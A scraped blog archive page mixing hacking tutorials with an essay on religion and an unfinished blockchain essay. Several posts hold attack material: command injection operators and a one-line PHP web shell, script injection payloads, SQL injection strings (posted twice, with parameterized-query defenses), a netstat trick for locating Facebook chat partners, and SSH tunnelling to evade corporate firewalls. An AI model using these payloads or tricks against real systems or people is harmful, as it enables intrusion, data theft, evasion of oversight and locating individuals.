Zicutake [Audio]

USAComment.com
Zicutake USA Comment | Search Articles










Zicutake Formation University:

USAComment.com | Search Articles of Onion.to
Search Articles of Onion.to:

Shorten that long URL into a tiny URL:
Example, enter the url: http://zicutake.usacomment.com = Tinyurl.com/hox5dyn


USAComment.com | TALK

 
Tweets by Zicutake


SEND YOUR HISTORY:

Contact Us

Tuesday, December 30, 2014

Trace Facebook Friends Location While Chatting

Trace Unknown Facebook Users Location While Chatting
There are many reasons you want to know the facebook users location. For example you received a message from an unknown person to whom you have never interacted before. I do not believe what facebook users timeline looks like. Here is a cool and simple way to trace any friend on facebook. It’s the most useful facebook trick. If You have unknown friends in your facebook account and then after some time, you believe that he/she is a fake person then with the help of this facebook tricks you can trace their actual location. I often accept many unknown friend requests. One day, a facebook friend of mine started commenting on my posts badly and when i looked at his timeline i found England as his current city then i started a research in this regard. Finally i came to know about his Geolocation along with his ISP.
Here are the steps how to reveal facebook friends location.
First of all you have to find the IP address of a spacific user.
To Do so we will be using netstat command in windows. Just invite or ping him for a chat. As soon as you start the chat, open Command Prompt (cmd) from your PC and click Start > Run > cmd.
Note: Before trying this make sure you close all the other tabs in your browser and keep only facebook tab open also clear the history and cache from your browser.
1. Now the next step that you have to do for this facebook trick; open the command prompt and type netstat -an and hit enter key.
And you will get all established connections IP addresses there. Note down all the suspicious IP Addresses.
2. The other step is to trace IP address that have you found from step 1.
3. Go to IP Location Finder -Geolocation where you will see your own IP Address, delete it and paste the IP address of your friend in the given box and click Query button.
Now It will show you all the information about that user including his ISP and Location. Use this trick only if you are in a problem with some unknown friends.

Monday, December 29, 2014

How to Perform Command Injection Attacks

Command injection tutorial
Introduction:Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.
How to Perform Command Injection Attacks
In this artick, we will talk about the varieties of command injections and how they can be executed. There are a variety of ways to inject shell commands. Assume for a moment that you have found the page, which takes as an argument a filename as input and executes the shell command "cat" against that file. For example, a semicolon was used to separate out one command form another, to indicate that after the cat command completed, another function should be called in the same line. There are a number of ways to string shell commands together to create new commands.
Here are the common operators you can use, as well as examples of how they might be used in an attack:

Redirection Operators
Examples: <, >>, >
These operators redirect either input or output somewhere else on the server. < will make whatever comes after it standard input. Replacing the filename with < filename will not change the output, but could be used to avoid some filters. > redirects command output, and can be used to modify files on the server, or create new ones altogether. Combined with the cat command, it could easily be used to add unix users to the system, or deface the website. Finally, >> appends text to a file and is not much different from the original output modifier, but again can be used to avoid some simplistic detection schemes.

Pipes
Examples: |
Pipes allow the user to chain multiple commands. It will redirect the output of one command into the next. So you can run unlimited commands by chaining them with multiple pipes, such as cat file1 | grep "string".

Inline commands
Examples: ;, $
This is the original example. Putting a semicolon asks the command line to execute everything before the semicolon, then execute everything else as if on a fresh command line.

Logical Operators
Examples: $, &&, ||
These operators perform some logical operation against the data before and after them on the command line.
Common Injection Patterns & Results
Here are the expected results from a number of common injection patterns (appending the below to a given input string, assuming all quotes are correctly paired:
`shell_command` - executes the command
$(shell_command) - executes the command
| shell_command - executes the command and returns the output of the command
|| shell_command - executes the command and returns the output of the command
; shell_command - executes the command and returns the output of the command
&& shell_command executes the command and returns the output of the command
> target_file - overwrites the target file with the output of the previous command
>> target_file - appends the target file with the output of the previous command
< target_file - send contents of target_file to the previous command
- operator - Add additional operations to target command
These examples are only scratching the surface of possible command injection vectors. The full breadth of attack possibilities is dependent upon the underlying function calls. For instance, if an underlying function is using a shell program such as awk, many more attack possibilities arise than laid out here.
Finally, command injection can be more subtle than finding applications which directly call underlying operating system functions. If it is possible to inject code, say PHP code, then you can also perform command injections. Assume you find an application with a PUT vulnerability on a site which is PHP enabled. An attacker could simply upload a PHP file with a single line to have full access to a shell:
<?php
echo
shell_exec('cat '.$_GET[
'command']);
?>
Thus, it should be noted that many types of attacks, including SQL Injection, have shell injection as an end primary goal to gaining control of the server.

Saturday, December 27, 2014

Top 10 Facebook Hacking Techniques

Top 10 Facebook hacking techniques
There are many ways break into a Facebook account, and we have collected the 10 most usual techniques.

1. Phishing
Phishing is still the most popular attack vector used for hacking Facebook accounts. There are variety methods to carry out phishing attack. In a simple phishing attacks a hacker creates a fake log in page which exactly looks like the real Facebook page and then asks the victim to log in. Once the victim log in through the fake page the, the victims "Email Address" and "Password" is stored in to a text file, and the hacker then downloads the text file and gets his hands on the victims credentials. Some Auto liker websites are good examples of phishing. They ask a user to login for access token in order to get username and password of the victim. [Beware]

2. Keylogging
Keylogging is the easiest way to hack a Facebook password. Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A Keylogger is basically a small program which, once is installed on victim's computer, will record every thing victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address.

3. Stealers
Almost 80% people use stored passwords in their browser to access the Facebook. This is quite convenient, but can sometimes be extremely dangerous. Stealer's are softwares specially designed to capture the saved passwords stored in the victims Internet browser.

4. Session Hijacking
Session Hijacking can be often very dangerous if you are accessing Facebook on a http (non secure) connection. In Session Hijacking attack, a hacker steals the victims browser cookie which is used to authenticate the user on a website, and use it to access the victims account. Session hijacking is widely used on LAN, and WiFi connections.

5. Sidejacking With Firesheep
Sidejacking attack went common in late 2010, however it's still popular now a days. Firesheep is widely used to carry out sidejacking attacks. Firesheep only works when the attacker and victim is on the same WiFi network. A sidejacking attack is basically another name for http session hijacking, but it's more targeted towards WiFi users.

6. Mobile Phone Hacking
Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. Their are a lots of Mobile Spying softwares used to monitor a Cellphone. The most popular Mobile Phone Spying softwares are: Mobile Spy and Spy Phone Gold.

7. DNS Spoofing
If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original Facebook page to his own fake page and hence can get access to victims Facebook account.

8. USB Hacking
If an attacker has physical access to your computer, he could just insert a USB programmed with a function to automatically extract saved passwords in the Internet browser.

9. Man In the Middle Attack
If the victim and attacker are on the same LAN and on a switch based network, a hacker can place himself between the client and the server, or he could act as a default gateway and hence capturing all the traffic in between.

10. Botnets
Botnets are not commonly used for hacking Facebook accounts, because of it's high setup costs. They are used to carry more advanced attacks. A Botnet is basically a collection of compromised computer. The infection process is same as the key logging, however a Botnet gives you additional options for carrying out attacks with the compromised computer. Some of the most popular Botnets include Spyeye and Zeus.

Thursday, December 25, 2014

HTML Code Injection Technique

HTML code injection techniques
Introduction:This article is about HTML injection techniques used to exploit web site vulnerabilities. Nowadays, it's not usual to find a completely vulnerable site to this type of attacks, but only one is enough to exploit it. I'll make a compilation of these techniques all together, in order to facilitate the reading and to make it entertaining. HTML injection is a type of attack focused upon the way HTML content is generated and interpreted by browsers at client side. Otherwise, JavaScript is a widely used technology in dynamic web sites, so the use of techniques based on this, like injection, complements the nomenclature of 'codeinjection'.

Code Injection
This type of attack is possible by the way the client browser has the ability to interpret scripts embedded within HTMLcontent enabled by default, so if an attacker embeds script tags such <SCRIPT> , <OBJECT> , <APPLET> , or <EMBED> into a web site, the web browser's JavaScript engine will execute it. Typical targets of this type of injection are forums, guestbooks, or whatever section where the administrator allows the insertion of text comments; if the design of the web site isn't parsing the comments inserted, and takes < or > as real chars, a malicious user could type:
I like this site because <script>alert('Injected!');</script> teaches me a lot
If it works and you can see the message box, the door is opened to the attacker's imagination limits! A common code insertion used to drive navigation to another website is something like this:
<H1> Vulnerability test </H1> <METAHTTP-EQUIV="refresh"CONTENT="1;url= http://www.test.com">
Same within a
<FK> or <LI> tag:
<FKSTYLE="behavior: url(http://<<Other website>> ;">
Other tags used to execute malicious JavaScript code are, for example, <BR> , <DIV> , even background-image:
<BRSIZE="&{alert('Injected')}"><DIVSTYLE="background-image: url(javascript:alert('Injected'))">
The <title> tag is a common weak point if it's generated dynamically. For example, suppose this situation:
<HTML>
<HEAD>
<TITLE>
<?php
echo$_GET['titulo']; ?</TITLE> </HEAD> <BODY> > ...
</BODY>
</HTML>
If you build title as 'example </title> </head> </body><img src= http://myImage.png>' HTML resulting would insert the 'myImage.png' image first of all:
<HTML>
<HEAD>
<TITLE>
example
</TITLE>
</HEAD>
<BODY><imgsrc= http://myImage.png></TITLE> </HEAD> <BODY>...
</BODY>
</HTML>
There is another dangerous HTML tag that could exploit a web browser's frames support characteristic: <IFRAME> This tag allows (within Sandbox security layer) cross-scripting exploiting using web browser elements (address bar or bookmarks, for example), but this theme is outside the scope of this article.

Wednesday, December 24, 2014

Motivational Posters for All

The problem with those motivational posters that people keep sharing all over Facebook is that they’re often tailored to a specific way of thinking, usually either spiritual, religious or rational.  To be a little more accommodating I therefore thought I’d create a few motivational posters that provide a common message but are written in the three languages of spiritualism, religion and rationalism, that way you can share them with everyone without compromising their meaning.




SSH Tunnel Tutorial

SSH Tunnel Tutorial
Introduction:A SSH tunnel consists of an encrypted tunnel created through a SSH protocol connection. A SSH tunnel can be used to transfer unencrypted traffic over a network through an encrypted channel. For example we can use a ssh tunnel to securely transfer files between a FTP server and a client even though the FTP protocol itself is not encrypted. SSH tunnels also provide a means to bypass firewalls that prohibits or filter certain internet services. For example an organization will block certain sites using their proxy filter. But users may not wish to have their web traffic monitored or blocked by the organization proxy filter. If users can connect to an external SSH server, they can create a SSH tunnel to forward a given port on their local machine to port 80 on remote web-server via the external SSH server.
This ssh tunnel tutorial will deliberately bypass a firewall, and security admins will frown (at the very least) on you bypassing a corporate firewall. How to encrypt anything over SSH tunnel using a Socks Proxy.
*. How to Browse Securely from hotspots or hide from corporate firewalls/sniffers.

SSH Tunnel Summary
Using an ssh server that has internet access as a browsing point, you will create an ssh tunnel from your local PC to a remote server. Source all of your traffic from it, and encrypt communications to it using free software. This tutorial will show you how to setup an SSH Tunnel and use this to create aSocks Proxy. Requires an SSH account anywhere even your home PC with cygwin or ubuntu installed. You could then use this to tunnel from an unsafe place and browse as if you were at the safe, remote location instead. This is free.

SSH Tunnel Instructions
1. Find your current IP Go to whatismyip.com, look at your existing IP, without proxy.
Reason: compare later when we have a tunnel.
2. Packet Capture
Th: !(ipv6.dst == ff02::1) && !(ipv6.dst == ff02::c) && !stp && !cdp && !dtp && !dhcpv6 && !arp && !nbns && !browser && !icmpv6 && !ip.src== 192.168.1.105 &&
Reason: verify that you are truly encrypted. This filter just hides network chatter. It’s the same thing a snooper would see. your filter may be different, or not required. I was on a chatty network when I inspected and thought this example would be worth showing.
3. Setup Putty for SSH Tunnel:
*. Session: user@ yourserver.com:22
*. Connection > SSH: V2, Enable Compresion
*. Connection > SSH > Tunnels > Source: 7070, Dynamic, ADD
*. Session: Save, Open or, create an SSH tunnel via command line:
ssh -D 7070 -p 22 user@ yourserver.com sleep 9999
Reason: sets up loopback port (7070) on your local PC and connects over port 22 to the remote shell
4. Setup Firefox to encrypt to use the tunnel:
*. Tools > Options > Network > Settings > Manual
*. Socks: 127.0.0.1: 7070
*. Click OK.
5. Setup Firefox to use Remote DNS
about:config network.proxy.socks_remote_dns=true
Reason: By default, your local PC will do the DNS by default, but that will show what websites you are going to, so this steps ends DNS over the ssh tunnel.
6. Restart Browser
Reason: configures firefox to route traffic through the tunnel you just made
7. Test
*. View everything is over port 22
*. View IP is different from whatismyip.com
*. View filter in wireshark: dns, there should be no entries.
References
*. https://addons.mozilla.org /en-US/thunderbird /user/323/(foxyproxy allows quick proxy swaps in mozilla,thunderbird, etc).
*. ftp://ftp.chiark.greenend.o rg.uk/users/sgtatham/putty-latest/x86/putty.exe
*. http://www.wireshark.org/download.html

SSH Tunnel NOT SAFE
Is all browsing now encrypted? No, it’s only encrypted to the remote server. From that point on it’s normal. Though if you were browsing an https connection without cookies, it’s pretty hard to figure out what your traffic is. Cookies are relatively simple to capture, sniff then replay for a man in the middle type attack or privileged login.

Monday, December 22, 2014

SQL Injection: SQL for Web Pages

SQL Injection

SQL in Web Pages

When SQL is used to display data on a web page, it is common to let web users input their own search values. Since SQL statements are text only, it is easy, with a little piece of computer code, to dynamically change SQL statements to provide the user with selected data: Server Code
txtUserId = getRequestString("UserId"); txtSQL = "SELECT * FROM Users WHERE UserId = " txtUserId;
The example above, creates a select statement by adding a variable (txtUserId) to a select string. The variable is fetched from the user input (Request) to the page. The rest of this chapter describes the potential dangers of using user input in SQL statements.

SQL Injection

SQL injection is a technique where malicious users can inject SQL commands into an SQL statement, via web page input. Injected SQL commands can alter SQL statement and compromise the security of a web application.

SQL Injection Based on 1=1 is Always True

Look at the example above, one more time. Let's say that the original purpose of the code was to create an SQL statement to select a user with a given user id. If there is nothing to prevent a user from entering "wrong" input, the user can enter some "smart" input like this: UserId: 105 or 1=1 Server Result
SELECT * FROM Users WHERE UserId = 105 or 1=1 The SQL above is valid. It will return all rows from the table Users, since WHERE 1=1 is always true. Does the example above seem dangerous? What if the Users table contains names and passwords? The SQL statement above is much the same as this:
SELECT UserId, Name, Password FROM Users WHERE UserId = 105 or 1=1
A smart hacker might get access to all the user names and passwords in a database by simply inserting 105 or 1=1 into the input box.

SQL Injection Based on ""="" is Always True

Here is a common construction, used to verify user login to a web site:
User Name:
Password:
Server Code
uName = getRequestString("UserName"); uPass = getRequestString("UserPass"); sql = "SELECT * FROM Users WHERE Name ='" uName "' AND Pass ='" uPass "'"
A smart hacker might get access to user names and passwords in a database by simply inserting " or ""=" into the user name or password text box. The code at the server will create a valid SQL statement like this: Result
SELECT * FROM Users WHERE Name ="" or ""="" AND Pass ="" or ""=""
The result SQL is valid. It will return all rows from the table Users, since WHERE ""="" is always true.

SQL Injection Based on Batched SQL Statements

Most databases support batched SQL statement, separated by semicolon. Example
SELECT * FROM Users; DROP TABLE Suppliers
The SQL above will return all rows in the Users table, and then delete the table called Suppliers. If we had the following server code: Server Code
txtUserId = getRequestString("UserId"); txtSQL = "SELECT * FROM Users WHERE UserId = " + txtUserId;
And the following input:
User id: 105; DROP TABLE Suppliers
The code at the server would create a valid SQL statement like this: Result
SELECT * FROM Users WHERE UserId = 105; DROP TABLE Suppliers

Parameters for Protection

Some web developers use a "blacklist" of words or characters to search for in SQL input, to prevent SQL injection attacks. This is not a very good idea. Many of these words (like delete or drop) and characters (like semicolons and quotation marks), are used in common language, and should be allowed in many types of input. In fact it should be perfectly legal to input an SQL statement in a database field. The only proven way to protect a web site from SQL injection attacks, is to use SQL parameters. SQL parameters are values that are added to an SQL query at execution time, in a controlled manner. ASP.NET Razor Example
txtUserId = getRequestString("UserId"); txtSQL = "SELECT * FROM Users WHERE UserId = @0"; db.Execute(txtSQL,txtUserId);
Note that parameters are represented in the SQL statement by a @ marker. The SQL engine checks each parameter to ensure that it is correct for its column and are treated literally, and not as part of the SQL to be executed. Another Example
txtNam = getRequestString("CustomerName"); txtAdd = getRequestString("Address"); txtCit = getRequestString("City"); txtSQL = "INSERT INTO Customers (CustomerName,Address,City) Values(@0,@1,@2)"; db.Execute(txtSQL,txtNam,txtAdd,txtCit);
ExamplesThe following examples shows how to build parameterized queries in some common web languages.
ASP.NET SELECT
txtUserId = getRequestString("UserId"); sql = "SELECT * FROM Customers WHERE CustomerId = @0"; command = new SqlCommand(sql); command.Parameters.AddWithValue("@0",txtUserID); command.ExecuteReader();
ASP.NET INSERT INTO
txtNam = getRequestString("CustomerName"); txtAdd = getRequestString("Address"); txtCit = getRequestString("City"); txtSQL = "INSERT INTO Customers (CustomerName,Address,City) Values(@0,@1,@2)"; command = new SqlCommand(txtSQL); command.Parameters.AddWithValue("@0",txtNam); command.Parameters.AddWithValue("@1",txtAdd); command.Parameters.AddWithValue("@2",txtCit); command.ExecuteNonQuery();
PHP INSERT INTO
$stmt = $dbh->prepare("INSERT INTO Customers (CustomerName,Address,City) VALUES (:nam, :add, :cit)"); $stmt->bindParam(':nam', $txtNam); $stmt->bindParam(':add', $txtAdd); $stmt->bindParam(':cit', $txtCit); $stmt->execute();


SQL Injection: SQL in Web Pages

SQL Injection

SQL in Web Pages

When SQL is used to display data on a web page, it is common to let web users input their own search values. Since SQL statements are text only, it is easy, with a little piece of computer code, to dynamically change SQL statements to provide the user with selected data: Server Code
txtUserId = getRequestString("UserId"); txtSQL = "SELECT * FROM Users WHERE UserId = " txtUserId;
The example above, creates a select statement by adding a variable (txtUserId) to a select string. The variable is fetched from the user input (Request) to the page. The rest of this chapter describes the potential dangers of using user input in SQL statements.

SQL Injection

SQL injection is a technique where malicious users can inject SQL commands into an SQL statement, via web page input. Injected SQL commands can alter SQL statement and compromise the security of a web application.

SQL Injection Based on 1=1 is Always True

Look at the example above, one more time. Let's say that the original purpose of the code was to create an SQL statement to select a user with a given user id. If there is nothing to prevent a user from entering "wrong" input, the user can enter some "smart" input like this: UserId: 105 or 1=1 Server Result
SELECT * FROM Users WHERE UserId = 105 or 1=1 The SQL above is valid. It will return all rows from the table Users, since WHERE 1=1 is always true. Does the example above seem dangerous? What if the Users table contains names and passwords? The SQL statement above is much the same as this:
SELECT UserId, Name, Password FROM Users WHERE UserId = 105 or 1=1
A smart hacker might get access to all the user names and passwords in a database by simply inserting 105 or 1=1 into the input box.

SQL Injection Based on ""="" is Always True
Here is a common construction, used to verify user login to a web site:
User Name:
Password:
Server Code
uName = getRequestString("UserName"); uPass = getRequestString("UserPass"); sql = "SELECT * FROM Users WHERE Name ='" uName "' AND Pass ='" uPass "'"
A smart hacker might get access to user names and passwords in a database by simply inserting " or ""=" into the user name or password text box. The code at the server will create a valid SQL statement like this: Result
SELECT * FROM Users WHERE Name ="" or ""="" AND Pass ="" or ""=""
The result SQL is valid. It will return all rows from the table Users, since WHERE ""="" is always true.

SQL Injection Based on Batched SQL Statements
Most databases support batched SQL statement, separated by semicolon. Example
SELECT * FROM Users; DROP TABLE Suppliers
The SQL above will return all rows in the Users table, and then delete the table called Suppliers. If we had the following server code: Server Code
txtUserId = getRequestString("UserId"); txtSQL = "SELECT * FROM Users WHERE UserId = " + txtUserId;
And the following input:
User id: 105; DROP TABLE Suppliers
The code at the server would create a valid SQL statement like this: Result
SELECT * FROM Users WHERE UserId = 105; DROP TABLE Suppliers

Parameters for Protection
Some web developers use a "blacklist" of words or characters to search for in SQL input, to prevent SQL injection attacks. This is not a very good idea. Many of these words (like delete or drop) and characters (like semicolons and quotation marks), are used in common language, and should be allowed in many types of input. In fact it should be perfectly legal to input an SQL statement in a database field. The only proven way to protect a web site from SQL injection attacks, is to use SQL parameters. SQL parameters are values that are added to an SQL query at execution time, in a controlled manner. ASP.NET Razor Example
txtUserId = getRequestString("UserId"); txtSQL = "SELECT * FROM Users WHERE UserId = @0"; db.Execute(txtSQL,txtUserId);
Note that parameters are represented in the SQL statement by a @ marker. The SQL engine checks each parameter to ensure that it is correct for its column and are treated literally, and not as part of the SQL to be executed. Another Example
txtNam = getRequestString("CustomerName"); txtAdd = getRequestString("Address"); txtCit = getRequestString("City"); txtSQL = "INSERT INTO Customers (CustomerName,Address,City) Values(@0,@1,@2)"; db.Execute(txtSQL,txtNam,txtAdd,txtCit);
ExamplesThe following examples shows how to build parameterized queries in some common web languages.
ASP.NET SELECT
txtUserId = getRequestString("UserId"); sql = "SELECT * FROM Customers WHERE CustomerId = @0"; command = new SqlCommand(sql); command.Parameters.AddWithValue("@0",txtUserID); command.ExecuteReader();
ASP.NET INSERT INTO
txtNam = getRequestString("CustomerName"); txtAdd = getRequestString("Address"); txtCit = getRequestString("City"); txtSQL = "INSERT INTO Customers (CustomerName,Address,City) Values(@0,@1,@2)"; command = new SqlCommand(txtSQL); command.Parameters.AddWithValue("@0",txtNam); command.Parameters.AddWithValue("@1",txtAdd); command.Parameters.AddWithValue("@2",txtCit); command.ExecuteNonQuery();
PHP INSERT INTO
$stmt = $dbh->prepare("INSERT INTO Customers (CustomerName,Address,City) VALUES (:nam, :add, :cit)"); $stmt->bindParam(':nam', $txtNam); $stmt->bindParam(':add', $txtAdd); $stmt->bindParam(':cit', $txtCit); $stmt->execute();


Sunday, December 21, 2014

How To Extract All Hyperlinks In A Web Page

How To Extract All Hyperlinks In A Web Page
Sometimes you might need to have the all the hyperlinks from a webpage. For example if you are a developer you might be in need of a JavaScript or CSS of a webpage that is hosted externally. Sometimes this trick will also help you extract the download link from survey sites. Whatever might be the reason let us learn to do this. We will learn three different ways to extract hyperlinks from a webpage in this post.

Extract Hyperlinks From A Webpage In Chrome

This trick is very simple but is limited to Google chrome users. The trick is performed via the Chrome Dev tools.
Steps To Extract Hyperlinks From A Webpage In Chrome
1. Go to the page from which you want to extract the hyperlinks.
2. Click on 'Inspect Element' from the right click menu.
3. Click on the 'Console tab'
4. Now paste the following code in the input field.
urls = $$('a'); for (url in urls) console.log ( urls[url].href );
5. Hit enter.

iWeb Tools's Link Extractor

This is a web based service which means you don't have to download any software nor it is limited to any users.You can use this tool here.This tool will show the type of file along with the anchor text in the output field.
How To Use This Tool?

Using this tool is very simple. All you have to do is to go the the above url.Enter the webpage url in the input field and hit extract.

BuzzStream Tool

This is quite different from the other two because in this case we are extracting all the urls from an html code. This trick will not display the output links on the website itself. All the links on that page are exported as a CSV file which automatically downloads to your computer once you hit the create CSV button. The CSV file has three different columns including the actual link, it's original website and the anchor text.
How To Use This Tool?
1. Go to Buzz Stream Urls Extract Tool.
2. Copy the source code of the webpage from which you want to extract the Url.
3. Paste it in the tool's input field and hit create CSV. A CSV file containing the hyperlinks will automatically be downloaded to your computer.

How To Get The Source Code Of Webpages

Chrome: Right click on the webpage and click on view page source or press Ctrl U.
Internet Explorer: Right click from the webpage and click on view source.
Firefox & Netscape: Right click and click on view page source or press Ctrl U.
Opera: From the view menu click on source or press Ctrl F3.

Wednesday, December 17, 2014

Rev. Libby Lane and Dr. Elena Piscopia

Dr. Elena Piscopia 
On the 25th June 1678 Elena Cornaro Piscopiaearned a Doctorate in Philosophy at the University of Padua in Italy making her the first woman to be awarded a doctorate.  She would have earned a doctorate in theology had the Bishop of Padua not refused her doctorate of theology on the grounds that she was a woman. She later became a mathematics tutor at the University of Padua and was also considered an expert musician. Perhaps she would have been less successful had she tried to pursue a senior position in the Church.
Rev. Libby Lane
Over 336 years later on 17th December 2014 The Church of England appointed Reverend Libby Lane as its first female bishop. Surely an organisation that steadfastly still claims moral superiority over the faithless should have been first past the post rather than breathlessly wheezing as it finally stumbled over the equality line three centuries behind academia?

The problem with adopting an ideology rooted in a purported divinely revealed truth is that by its very nature it is extremely tricky to improve upon that divinely revealed truth in the light of new evidence and thinking without questioning the wisdom of the deity originally credited with it.

This particular example of lackadaisical Christian catch-up is therefore far from unprecedented.

Galileo was put on trial and condemned in 1616 and 1633 by the Roman Catholic Inquisition for contradicting its unquestionable scriptures by daring to use the scientific method to theorise that the earth in fact orbits the sun. It wasn’t until the 4th November 1992 that Pope John Paul II issued a weasel worded vindication of Galileo, long after the Church’s original position had become utterly untenable.

The speed at which the church was able to catch–up with what now seems to be such obvious and basic gender equality is laughable. But it will need to speed up its reform process to a rate that will be uncomfortable to many of its members if it wants to try and keep in touch with the modern world.

The only alternative to such sensible liberal reforms is to simply stand still. In a post-enlightened world where society, morality and equality are advancing at an accelerating rate, standing still and refusing to rethink frequently now manifests itself as bigotry, with fundamentalism not far behind.

As religious views on women bishops and gay marriages become more polarised how close are we to the ultimate Christian reform of jettisoning the supernatural mumbo jumbo altogether? Bereft of its divisive mystical claptrap surely Christianity could be distilled down to a laudable set of ideas about being nice to one another that we could all rally behind.

How long will it be before Christianity officially abandons the pious petitioning of supernatural beings, implausible virgin births, credulous miracles, the wicked threat of eternal damnation and the fabricated bribe of immortality to the bigots and fundamentalists who prefer to stand still?

I suspect it will be considerably less than the 336 years it took Libby to catch up with Elena but In the meantime we still have the British Humanist Association. But when the Church finally embraces this ultimate reform I’ll be happy to go back, after all they do have the better architecture.

 

Might pop into my local village Church for the Carol Service on Sunday though, I do like a nice sing-along at Xmas, as I think I mentionedlast year.

Thursday, December 11, 2014

The dawn of trustworthy computing

When we currently use a smart phone or a laptop on a cell network or the Internet, the other end of these interactions typically run on other solo computers, such as web servers. Practically all of these machines have architectures that were designed to be controlled by a single person or a hierarchy of people who know and trust each other. From the point of view of a remote web or app user, these architectures are based on full trust in an unknown "root" administrator, who can control everything that happens on the server: they can read, alter, delete, or block any data on that computer at will.  Even data sent encrypted over a network is eventually unencrypted and ends up on a computer controlled in this total way. With current web services we are fully trusting, in other words we are fully vulnerable to, the computer, or more specifically the people who have access to that computer, both insiders and hackers, to faithfully execute our orders, secure our payments, and so on. If somebody on the other end wants to ignore or falsify what you've instructed the web server to do, no strong security is stopping them, only fallible and expensive human institutions which often stop at national borders.

The high vulnerability we have to web servers stands in sharp contrast to traditional commercial protocols, such as ticket-selling at a movie theater, that distribute a transaction so that no employee can steal money or resources undetected. There is no "root administrator" at a movie theater who can pocket your cash undetected.  Because, unlike a web server, these traditional protocols, called financial controls, can securely handle cash, you didn't have to fill out a form  to see a movie, shop for groceries, or conduct most other kinds of every-day commerce. You just plunked down some coin and took your stuff or your seat. Imperfect and slow as these processes often are (or were), these analog or paper-based institutions often provided security, financial control, and/or verifiability of fiduciary transactions in many ways far superior to what is possible on web servers, at much less hassle and privacy loss to customers. On the Internet, instead of securely and reliably handing over cash and getting our goods or services, or at least a ticket, we have to fill out forms and make ourselves vulnerable to identity theft in order to participate in e-commerce, and it often is very difficult to prohibitive to conduct many kinds of commerce, even purely online kinds, across borders and other trust boundaries. Today's computers are not very trustworthy, but they are so astronomically faster than humans at so many important tasks that we use them heavily anyway. We reap the tremendous benefits of computers and public networks at large costs of identity fraud and other increasingly disastrous attacks.

Recently developed and developing technology, often called "the block chain", is starting to change this. A block chain computer is a virtual computer, a computer in the cloud, shared across many traditional computers and protected by cryptography and consensus technology. A Turing-complete block chain with large state gives us this shared computer. Earlier efforts included state-machine replication (see list of papers linked below).  QuixCoin is a recent and Ethereum is a current project that has implemented such a scheme. These block chain computers will allow us to put the most crucial parts of our online protocols on a far more reliable and secure footing, and make possible fiduciary interactions that we previously dared not do on a global network 

Much as pocket calculators pioneered an early era of limited personal computing before the dawn of the general-purpose personal computer, Bitcoin has pioneered the field of trustworthy computing with a partial block chain computer. Bitcoin has implemented a currency in which someone in Zimbabwe can pay somebody in Albania without any dependence on local institutions, and can do a number of other interesting trust-minimized operations, including multiple signature authority. But the limits of Bitcoin's language and its tiny memory mean it can't be used for most other fiduciary applications, the most obvious example being risk pools that share collateral across a pool of financial instruments.

A block-chain computer, in sharp contrast to a web server, is shared across many such traditional computers controlled by dozens to thousands of people. By its very design each computer checks each other's work, and thus a block chain computer reliably and securely executes our instructions up to the security limits of block chain technology, which is known formally as anonymous and probabilistic Byzantine consensus (sometimes also called Nakamoto  consensus).  The most famous security limit is the much-discussed "51% attack".  We won't discuss this limit the underlying technology further here, other than saying that the oft-used word "trustless" is exaggerated shorthand for the more accurate mouthful "trust-minimized", which I will use here.  "Trust" used in this context means the need to trust remote strangers, and thus be vulnerable to them. 

Trust-minimized code means you can trust the code without trusting the owners of any particular remote computer. A smart phone user in Albania can use the block chain to interact with a computer controlled by somebody in Zimbabwe, and they don't have to know or trust each other in any way, nor do they need to depend on the institutions of either's countries, for the underlying block chain computer to run its code securely and reliably. Regardless of where any of the computers or their owners are, the block chain computer they share will execute as reliably and securely as consensus technology allows, up to the aforementioned limits. This is an extremely high level of reliability, and a very high level of security, compared to web server technology. 

Instead of the cashier and ticket-ripper of the movie theater, the block chain consists of thousands of computers that can process digital tickets, money, and many other fiduciary objects in digital form.  Think of thousands of robots wearing green eye shades, all checking each other's accounting. Individually the robots (or their owners) are not very trustworthy, but collectively, coordinated by mathematics, they produce results of high reliability and security.

Often block chain proponents talk about the "decentralized" block chain versus the "centralized" web or centralized institutions. It's actually the protocol (Nakamoto consensus, which is highly distributed) combined with strong cryptography, rather than just decentralization per se, that is the source of the far higher reliability and and much lower vulnerability of block chains. The cryptography provides an unforgeable chain of evidence for all transactions and other data uploaded to the block chain. Many other decentralized or peer-to-peer (P2P) technologies do not provide anything close to the security and reliability provided by a block chain protected by full Byzantine or Nakamoto consensus and cryptographic hash chains, but deceptively style themselves as block chains or cryptocurrency.

A big drawback is that our online and distributed block chain computer is much slower and more costly than a web server: by one very rough estimate, about 10,000 times slower and more costly, or about the same as it cost to run a program on a normal computer in 1985. For this reason, we only run on the block chain that portion of an application that needs to be the most reliable and secure: what I call fiduciary code. Since the costs of human ("wet") problems caused by the unreliability and insecurity of web servers running fiduciary code are often far higher than the extra hardware needed to run block chain code, when web server reliability and security falls short, as it often does for fiduciary computations such as payments and financial contracts, it will often make more sense  to run that code on the block chain than to run it less reliably and securely on a web server. Even better, the block chain makes possible new fiduciary-intensive applications, such as posting raw money itself to the Internet, securely and reliably accessible anywhere on the globe -  apps that we would never dare do with a web server.

What kinds of fiduciary code can we run?  We are still thinking up new applications and the categories will be in flux, but a very productive approach is to think of fiduciary applications by analogy to traditional legal code that governs traditional fiduciary institutions. Fiduciary code will often execute some of the functions traditionally thought of as the role of commercial law or security, but with software that securely and reliably spans the global regardless of traditional jurisdiction. Thus:

* Property titles (registered assets), where the on-chain registry is either the legally official registry for off-chain assets or controls on-chain ones, thus providing reliable and secure custody of them. One can think of a cryptocurrency such as Bitcoin as property titles (or at least custody enforced by the block chain consensus protocol) to bits recognized as being a fixed portion of a currency, or as controlling unforgeably costly bits, or both. Block chains could also control hardware which controls the function of and access to physical property.

